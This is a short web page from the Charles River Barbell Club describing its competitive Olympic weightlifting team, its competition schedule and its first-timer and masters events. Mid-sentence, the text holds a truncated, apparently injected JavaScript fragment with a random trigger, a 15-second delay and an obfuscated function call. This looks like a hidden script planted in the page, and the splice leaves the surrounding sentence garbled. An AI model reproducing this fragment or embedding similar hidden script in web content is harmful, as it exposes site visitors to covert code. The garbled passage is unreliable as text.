Olympic-style weightlifting is the style of weightlifting contested at the Olympic Games. Charles River Barbell Club

This is our competitive weightlifting team. The program is designed for lifters to peak for competitions andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and we expect to attend a minimum of 3 local or higher competitions per year as a group. There are local competitions specifically for first-timers so please ask if you are interested in competing but nervous to do so! There are also masters competitions for athletes over 35.
